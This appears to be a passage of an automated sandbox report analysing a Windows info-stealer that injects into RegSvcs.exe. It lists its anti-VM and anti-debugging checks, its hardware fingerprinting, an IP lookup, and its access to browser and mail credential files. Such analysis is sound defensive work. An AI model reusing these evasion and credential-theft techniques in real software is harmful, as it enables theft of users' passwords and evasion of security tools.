                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: uFzZ48M67c.exeStatic file information: File size 80740352 > 1048576
                    Source: Binary string: wntdll.pdbUGP source: uFzZ48M67c.exe, 00000000.00000003.1722530978.0000000004470000.00000004.00001000.00020000.00000000.sdmp, uFzZ48M67c.exe, 00000000.00000003.1722659698.0000000004610000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: uFzZ48M67c.exe, 00000000.00000003.1722530978.0000000004470000.00000004.00001000.00020000.00000000.sdmp, uFzZ48M67c.exe, 00000000.00000003.1722659698.0000000004610000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06A6DD90 push es; ret 1_2_06A6DDA0
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: uFzZ48M67c.exe PID: 6768, type: MEMORYSTR
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeAPI/Special instruction interceptor: Address: 3E8326C
                    Source: uFzZ48M67c.exe, 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003295000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2418Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1233Jump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85735
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeAPI coverage: 3.7 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98784Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98428Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98087Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97976Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: RegSvcs.exe, 00000001.00000002.2956839649.0000000003295000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000001.00000002.2957582143.000000000645B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                    Source: RegSvcs.exe, 00000001.00000002.2956839649.0000000003295000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: RegSvcs.exe, 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeAPI call chain: ExitProcess graph end nodegraph_0-84861

                    Anti Debugging

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017570B0 CheckRemoteDebuggerPresent,1_2_017570B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_03E83538 mov eax, dword ptr fs:[00000030h]0_2_03E83538
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_03E834D8 mov eax, dword ptr fs:[00000030h]0_2_03E834D8
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_03E81EB8 mov eax, dword ptr fs:[00000030h]0_2_03E81EB8
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EA0008Jump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\uFzZ48M67c.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                    Source: uFzZ48M67c.exeBinary or memory string: Shell_TrayWnd
                    Source: uFzZ48M67c.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uFzZ48M67c.exe.16a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: uFzZ48M67c.exe PID: 6768, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6988, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
